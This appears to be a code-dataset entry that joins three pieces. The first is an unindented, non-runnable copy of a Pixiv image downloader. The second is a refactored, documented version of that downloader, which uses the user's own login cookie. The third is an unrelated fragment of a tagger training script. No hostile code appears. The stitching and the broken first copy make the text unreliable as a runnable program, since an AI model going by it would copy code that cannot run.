path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'monthly':
mode = 'monthly'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'rookie':
mode = 'rookie'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'original':
mode = 'original'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'female':
mode = 'female'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'daily_r18':
if r18mode == True:
mode = 'daily_r18'
path = f'./img/R18/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'male':
mode = 'male'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif search == None:
path = f'./img/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif search != None and isinstance(search,str):
path = f'./img/{search}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
# get json data
def pixiv_get(id,cfg:dict) -> str:
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
url = f'https://www.pixiv.net/ajax/illust/{id}/pages'
req = requests.get(url,headers=headers)
req = req.json()
# print(req)
body_data = req['body']
return body_data
# download img
def dl_img(id:int or list,cfg:dict,search=None,ranking=None,r18mode=False,AllInOneDir=False) -> bytes:
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
# 判斷 id 是否列表
if type(id) == list:
for i in tqdm(id):
# get json data
data_json = pixiv_get(i[0],cfg)
if AllInOneDir == True:
for url in data_json:
url = url['urls']['original']
re_name = url.split("/")[-1]
# req = th.submit(requests.get,url,headers=headers)
req = requests.get(url,headers=headers)
with open(f'./img/{re_name}','wb') as f:
f.write(req.content)
else:
# get folder name
folder_name = i[1]
# mark folder
if search != None:
mark_dir(folder_name,search)
elif ranking != None:
if r18mode == True:
mark_dir(folder_name,ranking=ranking,r18mode=True)
else:
mark_dir(folder_name,ranking=ranking)
elif search == None:
mark_dir(folder_name)
for iter1 in data_json:
# get original url
iter1 = iter1['urls']['original']
# get file name
n_name = iter1.split("/")
req = requests.get(iter1,headers=headers)
# save img
if search != None:
with open(f'./img/{search}/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
elif ranking != None:
if r18mode == True:
with open(f'./img/R18/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
else:
with open(f'./img/{ranking}/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
elif search == None:
with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
return 'DONE'
folder_name = get_user(id)
data_json = pixiv_get(id,cfg)
for i in tqdm(data_json):
i = i['urls']['original']
n_name = i.split("/")
if AllInOneDir == True:
req = requests.get(i,headers=headers)
with open(f'./img/{n_name[-1]}','wb') as f:
f.write(req.content)
else:
mark_dir(folder_name)
req = requests.get(i,headers=headers)
with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
return 'DONE'
# get id list
def pixiv_search(name:str,cfg:dict,mode=0) -> list:
# cookie == None ?
class_json = ['illust','popular']
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
# save data
id_list = []
# https://www.pixiv.net/ajax/search/illustrations/甘雨(原神)?word=甘雨(原神)&order=date_d&mode=all&p=1&s_mode=s_tag_full&type=illust_and_ugoira&lang=zh_tw
url = f'https://www.pixiv.net/ajax/search/illustrations/{name}'
if mode == 0:
params = {
'word' : name,
'mode' : 'all'
}
elif mode == 1:
params = {
'word' : name,
'mode' : 'safe'
}
elif mode == 2:
params = {
'word' : name,
'mode' : 'r18'
}
req = requests.get(url,headers=headers,params=params)
# q= req
req = req.json()
# with open("pixiv/jsondata.json",'w') as f:
# f.write(q.text.encode().decode('unicode_escape').replace(r'\/',r'/'))
# print(req,url)
for json_tage in class_json:
try:
# get id
body_data = req['body']['illust']['data']
data_long = len(body_data)
for i in range(data_long):
id_num = body_data[i]['id']
userName = body_data[i]['userName']
userName = name_replace(userName)
id_list.append([id_num,userName])
except KeyError:
# print(json_tage)
body_data = req['body']['popular']['permanent']
id_long = len(body_data)
# print(id_long)
for num in range(id_long):
id_num = body_data[num]['id']
userName = body_data[num]['userName']
userName = name_replace(userName)
id_list.append([id_num,userName])
body_data_1 = req['body']['popular']['recent']
id_long_2 = len(body_data_1)
# print(id_long_2)
for num_2 in range(id_long_2):
id_num_2 = body_data_1[num_2]['id']
userName_2 = body_data_1[num_2]['userName']
userName_2 = name_replace(userName_2)
id_list.append([id_num_2,userName_2])
search = name
return id_list,search
# ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
def ranking(page:int, cfg:dict,mode_num=0,r18mode=0):
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
id_name_list = []
if mode_num == 0:
mode = 'daily'
elif mode_num == 1:
mode = 'weekly'
elif mode_num == 2:
mode = 'monthly'
elif mode_num == 3:
mode = 'rookie'
elif mode_num == 4:
mode = 'original'
elif mode_num == 5:
mode = 'female'
elif mode_num == 6:
if r18mode == 0:
mode = 'daily_r18'
elif r18mode == 1:
mode = 'weekly_r18'
elif r18mode == 2:
mode = 'male_r18'
elif r18mode == 3:
mode = 'female_r18'
elif mode_num == 7:
mode = 'male'
for page_num in range(page):
# ?p={page_num+1}&format=json
url = f'https://www.pixiv.net/ranking.php'
params = {
'p' : page_num+1,
'format' : 'json',
'mode' : mode
}
req = requests.get(url ,headers=headers,params=params)
req = req.json()
json_data = req['contents']
times = len(json_data)
for len_data in range(times):
id_num = json_data[len_data]['illust_id']
userName = json_data[len_data]['user_name']
userName = name_replace(userName)
id_name_list.append([id_num,userName])
# id_name_list.append(id_num)
if mode_num == 6:
mode = 'daily_r18'
return id_name_list,mode
# https://www.pixiv.net/ajax/search/artworks/甘雨?word=甘雨&order=popular_d&mode=all&p=1&s_mode=s_tag&type=all
#Need premium
def premium_search(name:str,order_num:int,mode_num:int,page_num:int,cfg:dict):
id_list = []
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
order = ['popular_d','popular_male_d','popular_female_d']
mode = ['s_tag','safe','r18']
for pages in range(page_num):
params = {
'word' : {name},
'order' : {order[order_num]},
'mode' : {mode[mode_num]},
'p' : {pages+1},
's_mode' : 's_tag',
'type' : 'all'
}
url = f'https://www.pixiv.net/ajax/search/artworks/{name}'
req = requests.get(url,headers=headers,params=params)
json_data = req.json()
print(json_data)
data_long = len(json_data['body']['illustManga']['data'])
target_data = json_data['body']['illustManga']['data']
for list_num in range(data_long):
# print(target_data[0])
# print(data_long)
illusts_id = target_data[list_num]["id"]
user_name = target_data[list_num]['userName']
userName = name_replace(userName)
id_list.append([illusts_id,user_name])
search = name
return id_list,search
def get_user_illusts(user_id:int,cfg:dict):
id_list = []
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
url = f'https://www.pixiv.net/ajax/user/{user_id}/profile/all'
user_url = f'https://www.pixiv.net/ajax/user/{user_id}'
req_user = requests.get(user_url,headers=headers)
req_user = req_user.json()
user_name = req_user['body']['name']
req = requests.get(url,headers=headers)
req = req.json()
for illusts_ids in req['body']['illusts']:
id_list.append([illusts_ids,user_name])
return id_list
# id -> artid
# get name for id mode
def get_user(id:int) -> str:
url = f'https://www.pixiv.net/artworks/{id}'
req = requests.get(url)
text = req.text
# print(text)
# find name
obj = re.compile(r'"name":"(?P<name>.*?)"')
user_name = obj.finditer(text)
# get name
for it in user_name:
name = it.group('name')
# del非法字符
name = name_replace(name)
return name
def main():
os.system('cls')
print(banner)
cfg = config_pixiv()
AllInOneDir = cfg['path']['AllInOnePath']
print('0:Pixiv_id mode\n1:Search mode\n2:Ranking mode\n3:User illusts\n4:Premium search(Need premium)')
mode = int(input('Mode:'))
print(f"Mode:{mode}".center(50,'='))
if mode == 0: #id mode
dl_img(int(input('Pixiv_id:')),cfg,AllInOneDir=AllInOneDir)
elif mode > 10000:
dl_img(mode,cfg,AllInOneDir=AllInOneDir)
elif mode == 1: #search mode
search = input("Search:")
print('0:All\n1:Safe\n2:R18(login)')
mode_num = int(input('mode:'))
id_list , search_name = pixiv_search(search,cfg,mode=mode_num)
dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
elif mode == 2: #ranking mode?
# ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
page = int(input('Page:'))
print('0:daily\n1:weekly\n2:monthly\n3:rookie\n4:original\n5:for female\n6:r18(login)\n7:for male')
ranking_num = int(input('ranking_mode:'))
if ranking_num == 6:
try:
print('0:daily_r18\n1:weekly_r18\n2:male_r18\n3:female_r18')
r18mode = int(input("R18_mode:"))
id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num,r18mode=r18mode)
# print(mode_ranking)
dl_img(id_name_list,cfg,ranking=mode_ranking,r18mode=True,AllInOneDir=AllInOneDir)
except JSONDecodeError:
exit('未登錄 . . .')
else:
id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num)
# print(id_name_list)
# with ThreadPoolExecutor(30) as th:
# for ids in id_name_list:
# th.submit(dl_img,id=ids[0],cfg=cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
dl_img(id_name_list,cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
elif mode == 3: #get_user_illusts
user_id = int(input('user_id:'))
id_list = get_user_illusts(user_id,cfg)
dl_img(id_list,cfg,AllInOneDir=AllInOneDir)
elif mode == 4: #premium_search
search = input("Search:")
print('0:All popular\n1:Popula for male\n2:Popula for female')
order_num = int(input('order:'))
print('0:r18 & safe\n1:safe\n2:R18')
mode_4_num = int(input('mode:'))
pages = int(input('pages:'))
id_list , search_name = premium_search(search,order_num,mode_4_num,pages,cfg)
dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
# cfg = config_pixiv()
# print(cfg['login']['cookie'])
# id_list , search_name = pixiv_search('甘雨',cfg)
# print(name)
# print(id_list)
# name = get_user(id_list)
# mark_dir(name)
# dl_img(id_list,cfg,search_name)
# print(pixiv_get())
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit('\nKeyboardInterrupt exit. . .')
| banner = '''
___ _ _ _
| _ \ (_) __ __ (_) __ __ (_) _ __ __ _ _ __ _ _
| _/ | | \ \ / | | \ V / | | | ' \ / _` | _ | '_ \ | || |
|_| |_| /_\_\ |_| \_/ ___ |_| |_|_|_| \__, | (_) | .__/ \_, |
|___| |___/ |_| |__/
'''
#-*- coding: utf-8 -*
import requests
import os
import re
import toml
from tqdm import tqdm
from json.decoder import JSONDecodeError
# get pixiv_cookie.toml
def config_pixiv():
cfg = toml.load(os.path.expanduser('./pixiv_cookie.toml'))
return cfg
def name_replace(name):
    """Sanitize a scraped user/artist name for use as a Windows path component.

    Removes the literal 6-char sequence ``\\u0027``, doubled backslashes, and
    every character that is illegal in Windows file names (/ : * ? " < > |).

    Args:
        name: raw name string scraped from pixiv.

    Returns:
        The sanitized name.

    Note: the old parameter was called ``str`` (shadowing the builtin); all
    call sites in this file pass it positionally.
    """
    # same order as the old chained replaces: escape artifacts first
    name = name.replace(r"\u0027", '')
    name = name.replace('\\\\', '')
    # one C-level pass instead of eight chained .replace() calls
    return name.translate(str.maketrans('', '', r'/:*?"<>|'))
# make destination folder
# Ranking categories that get their own sub-folder under ./img/.
_RANKING_DIRS = ('daily', 'weekly', 'monthly', 'rookie', 'original',
                 'female', 'male')


def mark_dir(name: str, search=None, ranking=None, r18mode=False):
    """Create the destination folder for an artist's downloads.

    Layout (identical to the old if/elif chain of 8 copy-pasted branches):
      * ranking in _RANKING_DIRS        -> ./img/<ranking>/<name>的作品
      * ranking == 'daily_r18'          -> ./img/R18/<name>的作品 (only if r18mode)
      * other/unknown ranking or no search -> ./img/<name>的作品
      * search given (str)              -> ./img/<search>/<name>的作品

    Existing folders are left untouched (exist_ok replaces the old
    try/except FileExistsError).
    """
    if ranking in _RANKING_DIRS:
        path = f'./img/{ranking}/{name}的作品'
    elif ranking == 'daily_r18':
        if not r18mode:
            # old behaviour: the R18 folder is only created in r18 mode
            return
        path = f'./img/R18/{name}的作品'
    elif search is None:
        path = f'./img/{name}的作品'
    elif isinstance(search, str):
        path = f'./img/{search}/{name}的作品'
    else:
        # non-str search with no recognised ranking: old chain did nothing
        return
    os.makedirs(path, exist_ok=True)
# fetch the ajax page-list JSON for one illustration
def pixiv_get(id, cfg: dict) -> str:
    """Return the 'body' field (list of page/url dicts) for illustration *id*."""
    request_headers = {
        'referer' : "https://www.pixiv.net/",
        'cookie' : f"{cfg['login']['cookie']}",
        'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",
    }
    response = requests.get(f'https://www.pixiv.net/ajax/illust/{id}/pages',
                            headers=request_headers)
    # only 'body' is needed downstream
    return response.json()['body']
# download img
def dl_img(id:int or list,cfg:dict,search=None,ranking=None,r18mode=False,AllInOneDir=False) -> bytes:
    """Download the original image(s) for one pixiv id or for a list of
    [illust_id, author_name] pairs.

    Args:
        id: single illustration id, or a list of [illust_id, author_name] pairs.
        cfg: parsed pixiv_cookie.toml (login cookie sent with every request).
        search: search keyword; files go under ./img/<search>/<author>的作品.
        ranking: ranking label; files go under ./img/<ranking>/... or ./img/R18/...
        r18mode: route ranking downloads into ./img/R18 instead.
        AllInOneDir: dump every file directly into ./img/ with no per-author folder.

    Returns:
        The string 'DONE'.
        # NOTE(review): the `-> bytes` annotation and the `id:int or list`
        # annotation (which evaluates to just `int`) do not match reality.
    """
    headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
    # is id a list of [illust_id, author_name] pairs?
    if type(id) == list:
        for i in tqdm(id):
            # get json data
            data_json = pixiv_get(i[0],cfg)
            if AllInOneDir == True:
                for url in data_json:
                    url = url['urls']['original']
                    re_name = url.split("/")[-1]
                    # req = th.submit(requests.get,url,headers=headers)
                    req = requests.get(url,headers=headers)
                    with open(f'./img/{re_name}','wb') as f:
                        f.write(req.content)
            else:
                # get folder name
                folder_name = i[1]
                # mark folder
                if search != None:
                    mark_dir(folder_name,search)
                elif ranking != None:
                    if r18mode == True:
                        mark_dir(folder_name,ranking=ranking,r18mode=True)
                    else:
                        mark_dir(folder_name,ranking=ranking)
                elif search == None:
                    mark_dir(folder_name)
                for iter1 in data_json:
                    # get original url
                    iter1 = iter1['urls']['original']
                    # get file name
                    n_name = iter1.split("/")
                    req = requests.get(iter1,headers=headers)
                    # save img (destination mirrors the mark_dir branch above)
                    if search != None:
                        with open(f'./img/{search}/{folder_name}的作品/{n_name[-1]}','wb') as f:
                            f.write(req.content)
                    elif ranking != None:
                        if r18mode == True:
                            with open(f'./img/R18/{folder_name}的作品/{n_name[-1]}','wb') as f:
                                f.write(req.content)
                        else:
                            with open(f'./img/{ranking}/{folder_name}的作品/{n_name[-1]}','wb') as f:
                                f.write(req.content)
                    elif search == None:
                        with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
                            f.write(req.content)
        return 'DONE'
    # single-id path: author name is scraped from the artwork page
    folder_name = get_user(id)
    data_json = pixiv_get(id,cfg)
    for i in tqdm(data_json):
        i = i['urls']['original']
        n_name = i.split("/")
        if AllInOneDir == True:
            req = requests.get(i,headers=headers)
            with open(f'./img/{n_name[-1]}','wb') as f:
                f.write(req.content)
        else:
            mark_dir(folder_name)
            req = requests.get(i,headers=headers)
            with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
                f.write(req.content)
    return 'DONE'
# get id list
def pixiv_search(name:str, cfg:dict, mode=0) -> list:
    """Search pixiv illustrations by keyword.

    Args:
        name: search keyword.
        cfg: parsed pixiv_cookie.toml.
        mode: 0 = all, 1 = safe only, 2 = R18 only (R18 needs a login cookie).
              Unknown values fall back to 'all' (the old code raised NameError).

    Returns:
        (id_list, name) where id_list is [[illust_id, author_name], ...].

    Bug fixed: the old code wrapped the extraction in
    ``for json_tage in ['illust', 'popular']`` without ever using the loop
    variable, so the whole body ran twice and every id was appended (and
    later downloaded) twice.
    """
    headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
    id_list = []
    # https://www.pixiv.net/ajax/search/illustrations/甘雨(原神)?word=甘雨(原神)&order=date_d&mode=all&p=1&s_mode=s_tag_full&type=illust_and_ugoira&lang=zh_tw
    url = f'https://www.pixiv.net/ajax/search/illustrations/{name}'
    search_mode = {0: 'all', 1: 'safe', 2: 'r18'}.get(mode, 'all')
    params = {
        'word' : name,
        'mode' : search_mode
    }
    req = requests.get(url, headers=headers, params=params).json()
    try:
        # normal result layout: body.illust.data
        for entry in req['body']['illust']['data']:
            id_list.append([entry['id'], name_replace(entry['userName'])])
    except KeyError:
        # fallback layout: body.popular.{permanent,recent}
        for section in ('permanent', 'recent'):
            for entry in req['body']['popular'][section]:
                id_list.append([entry['id'], name_replace(entry['userName'])])
    return id_list, name
# ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
def ranking(page:int, cfg:dict,mode_num=0,r18mode=0):
    """Collect [illust_id, author_name] pairs from the pixiv ranking pages.

    Args:
        page: number of ranking pages to fetch.
        cfg: parsed pixiv_cookie.toml (cookie is required for R18 rankings).
        mode_num: 0-7 index into the category list in the comment above.
        r18mode: sub-category used only when mode_num == 6
            (0 daily_r18, 1 weekly_r18, 2 male_r18, 3 female_r18).

    Returns:
        (id_name_list, mode) where mode is the ranking label that
        mark_dir/dl_img use to pick the destination folder.
    """
    headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
    id_name_list = []
    if mode_num == 0:
        mode = 'daily'
    elif mode_num == 1:
        mode = 'weekly'
    elif mode_num == 2:
        mode = 'monthly'
    elif mode_num == 3:
        mode = 'rookie'
    elif mode_num == 4:
        mode = 'original'
    elif mode_num == 5:
        mode = 'female'
    elif mode_num == 6:
        if r18mode == 0:
            mode = 'daily_r18'
        elif r18mode == 1:
            mode = 'weekly_r18'
        elif r18mode == 2:
            mode = 'male_r18'
        elif r18mode == 3:
            mode = 'female_r18'
    elif mode_num == 7:
        mode = 'male'
    for page_num in range(page):
        # ?p={page_num+1}&format=json
        url = f'https://www.pixiv.net/ranking.php'
        params = {
            'p' : page_num+1,
            'format' : 'json',
            'mode' : mode
        }
        req = requests.get(url ,headers=headers,params=params)
        req = req.json()
        json_data = req['contents']
        times = len(json_data)
        for len_data in range(times):
            id_num = json_data[len_data]['illust_id']
            userName = json_data[len_data]['user_name']
            # strip characters that are illegal in Windows folder names
            userName = name_replace(userName)
            id_name_list.append([id_num,userName])
            # id_name_list.append(id_num)
    # deliberately collapse every R18 sub-category to 'daily_r18' so that
    # mark_dir/dl_img put all R18 downloads under the single ./img/R18 folder
    if mode_num == 6:
        mode = 'daily_r18'
    return id_name_list,mode
# https://www.pixiv.net/ajax/search/artworks/甘雨?word=甘雨&order=popular_d&mode=all&p=1&s_mode=s_tag&type=all
#Need premium
def premium_search(name:str,order_num:int,mode_num:int,page_num:int,cfg:dict):
    """Popularity-ordered artwork search (requires a pixiv premium account).

    Args:
        name: search keyword.
        order_num: 0 all popular, 1 popular for male, 2 popular for female.
        mode_num: 0 s_tag (all), 1 safe, 2 r18.
        page_num: number of result pages to collect.
        cfg: parsed pixiv_cookie.toml.

    Returns:
        (id_list, name) where id_list is [[illust_id, author_name], ...].

    Bug fixed: the old loop did ``userName = name_replace(userName)`` on an
    undefined variable, raising NameError on the first result; the author
    name is now sanitized like everywhere else.
    """
    id_list = []
    headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
    order = ['popular_d','popular_male_d','popular_female_d']
    mode = ['s_tag','safe','r18']
    url = f'https://www.pixiv.net/ajax/search/artworks/{name}'
    for pages in range(page_num):
        # plain values, not the old one-element set literals ({name}, ...),
        # which requests only serialized correctly by accident
        params = {
            'word' : name,
            'order' : order[order_num],
            'mode' : mode[mode_num],
            'p' : pages + 1,
            's_mode' : 's_tag',
            'type' : 'all'
        }
        req = requests.get(url,headers=headers,params=params)
        json_data = req.json()
        # (removed a leftover debug print of the whole JSON payload)
        for entry in json_data['body']['illustManga']['data']:
            id_list.append([entry['id'], name_replace(entry['userName'])])
    return id_list, name
def get_user_illusts(user_id:int,cfg:dict):
    """Return [[illust_id, author_name], ...] for every illustration of one user."""
    request_headers = {
        'referer' : "https://www.pixiv.net/ranking.php",
        'cookie' : f"{cfg['login']['cookie']}",
        'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",
        'Content-Type': 'application/json',
    }
    # author display name first (same request order as before)
    profile = requests.get(f'https://www.pixiv.net/ajax/user/{user_id}',
                           headers=request_headers).json()
    author = profile['body']['name']
    # 'illusts' maps illustration id -> metadata; iterating yields the ids
    works = requests.get(f'https://www.pixiv.net/ajax/user/{user_id}/profile/all',
                         headers=request_headers).json()
    return [[illust_id, author] for illust_id in works['body']['illusts']]
# id -> artid
# get author name for single-id mode
def get_user(id:int) -> str:
    """Scrape the artwork page of *id* and return the sanitized author name."""
    page_text = requests.get(f'https://www.pixiv.net/artworks/{id}').text
    # keep the value of the LAST "name":"..." occurrence, exactly like the
    # old loop did; name_replace strips Windows-illegal path characters
    for match in re.finditer(r'"name":"(?P<name>.*?)"', page_text):
        name = name_replace(match.group('name'))
    return name
def main():
    """Interactive entry point: ask for a mode, then download accordingly."""
    # clear screen (Windows 'cls')
    os.system('cls')
    print(banner)
    cfg = config_pixiv()
    # when truthy, every file is dumped straight into ./img/ (no per-author dirs)
    AllInOneDir = cfg['path']['AllInOnePath']
    print('0:Pixiv_id mode\n1:Search mode\n2:Ranking mode\n3:User illusts\n4:Premium search(Need premium)')
    mode = int(input('Mode:'))
    print(f"Mode:{mode}".center(50,'='))
    if mode == 0: #id mode
        dl_img(int(input('Pixiv_id:')),cfg,AllInOneDir=AllInOneDir)
    # typing an illustration id directly instead of a mode number also works
    elif mode > 10000:
        dl_img(mode,cfg,AllInOneDir=AllInOneDir)
    elif mode == 1: #search mode
        search = input("Search:")
        print('0:All\n1:Safe\n2:R18(login)')
        mode_num = int(input('mode:'))
        id_list , search_name = pixiv_search(search,cfg,mode=mode_num)
        dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
    elif mode == 2: #ranking mode?
        # ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
        page = int(input('Page:'))
        print('0:daily\n1:weekly\n2:monthly\n3:rookie\n4:original\n5:for female\n6:r18(login)\n7:for male')
        ranking_num = int(input('ranking_mode:'))
        if ranking_num == 6:
            # R18 rankings need a valid login cookie; when not logged in the
            # endpoint returns a non-JSON page and json() raises
            try:
                print('0:daily_r18\n1:weekly_r18\n2:male_r18\n3:female_r18')
                r18mode = int(input("R18_mode:"))
                id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num,r18mode=r18mode)
                # print(mode_ranking)
                dl_img(id_name_list,cfg,ranking=mode_ranking,r18mode=True,AllInOneDir=AllInOneDir)
            except JSONDecodeError:
                # message means "not logged in"
                exit('未登錄 . . .')
        else:
            id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num)
            # print(id_name_list)
            # with ThreadPoolExecutor(30) as th:
            #   for ids in id_name_list:
            #       th.submit(dl_img,id=ids[0],cfg=cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
            dl_img(id_name_list,cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
    elif mode == 3: #get_user_illusts
        user_id = int(input('user_id:'))
        id_list = get_user_illusts(user_id,cfg)
        dl_img(id_list,cfg,AllInOneDir=AllInOneDir)
    elif mode == 4: #premium_search
        search = input("Search:")
        print('0:All popular\n1:Popula for male\n2:Popula for female')
        order_num = int(input('order:'))
        print('0:r18 & safe\n1:safe\n2:R18')
        mode_4_num = int(input('mode:'))
        pages = int(input('pages:'))
        id_list , search_name = premium_search(search,order_num,mode_4_num,pages,cfg)
        dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
# cfg = config_pixiv()
# print(cfg['login']['cookie'])
# id_list , search_name = pixiv_search('甘雨',cfg)
# print(name)
# print(id_list)
# name = get_user(id_list)
# mark_dir(name)
# dl_img(id_list,cfg,search_name)
# print(pixiv_get())
# Script entry point: run the interactive downloader, exit quietly on Ctrl-C.
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # exit(msg) prints the message and terminates with status 1
        exit('\nKeyboardInterrupt exit. . .')
|
# Dmitry Kisler © 2020-present
# www.dkisler.com
import os
import pathlib
import time
import importlib
import argparse
import json
from typing import Tuple, Union
from tagger_framework.utils.logger import getLogger
import warnings
warnings.simplefilter(action='ignore',
category=FutureWarning)
# model plug-in location and storage buckets (overridable via env vars)
MODEL_PKG_NAME = "tagger_framework.tagger.pos"
MODEL_VERSION = os.getenv("MODEL_VERSION", "v1")
BUCKET_DATA = os.getenv("BUCKET_DATA", "/data")
BUCKET_MODEL = os.getenv("BUCKET_MODEL", "/model")


def get_model_dir() -> str:
    """Build the dated model output directory: <bucket>/<version>/YYYY/MM/DD (UTC)."""
    # single quotes inside the f-string: double quotes nested inside a
    # double-quoted f-string are Python >= 3.12-only syntax (PEP 701) and
    # were a SyntaxError on every older interpreter
    return f"{BUCKET_MODEL}/{MODEL_VERSION}/{time.strftime('%Y/%m/%d', time.gmtime())}"
def get_args() -> argparse.Namespace:
    """Input parameters parser.

    Returns:
      Namespace of stdin parameters.
    """
    parser = argparse.ArgumentParser(description="Model trainer.")
    # train/dev corpora are mandatory; test corpus and model paths are optional
    parser.add_argument('--path-train',
                        help="Path to train corpus.",
                        type=str,
                        default=None,
                        required=True)
    parser.add_argument('--path-dev',
                        help="Path to dev corpus.",
                        type=str,
                        default=None,
                        required=True)
    parser.add_argument('--path-test',
                        help="Path to test corpus.",
                        type=str,
                        default=None,
                        required=False)
    parser.add_argument('--path-model',
                        help="Path to pre-trained model.",
                        type=str,
                        default=None,
                        required=False)
    parser.add_argument('--path-model-out',
                        help="Path to store model into.",
                        type=str,
                        default=None,
                        required=False)
    # free-form JSON, decoded later by train_configs_parser
    parser.add_argument('--train-config',
                        help="""Configurations for model training as JSON.
                        Example:
                        {"learning_rate": 0.00001}
                        """,
                        type=str,
                        default=None,
                        required=False)
    args = parser.parse_args()
    return args
def train_configs_parser(conf: str) -> Tuple[Union[dict, None],
                                             Union[None, Exception]]:
    """Parse the --train-config JSON string.

    Args:
        conf: Input configs string, e.g. '{"learning_rate": 0.00001}'.

    Returns:
        (parsed_dict, None) on success, (None, exception) on invalid JSON.
        The error slot was annotated as ``str`` before, but the function has
        always returned the JSONDecodeError instance itself.
    """
    try:
        return json.loads(conf), None
    except json.JSONDecodeError as ex:
        return None, ex
# Training entry point: build the corpus, train/evaluate the model, persist it.
if __name__ == "__main__":
    logs = getLogger(logger=f"service/train/{MODEL_VERSION}")
    logs.send("Init.", is_error=False, kill=False)
    # link the model module (<MODEL_PKG_NAME>.<MODEL_VERSION>.model)
    try:
        model_module = importlib.import_module(f"{MODEL_PKG_NAME}.{MODEL_VERSION}.model")
    except Exception as ex:
        logs.send(f"Model {MODEL_VERSION} is not defined in the package {MODEL_PKG_NAME}.\nError:{ex}",
                  lineno=logs.get_line(),
                  kill=True)
    args = get_args()
    logs.send("Reading data and building corpus.", is_error=False, kill=False)
    # read train data corpus
    path_data_train = f"{BUCKET_DATA}/{args.path_train}"
    if not os.path.isfile(path_data_train):
        logs.send(f"Train data set {path_data_train} not found.",
                  lineno=logs.get_line(),
                  kill=True)
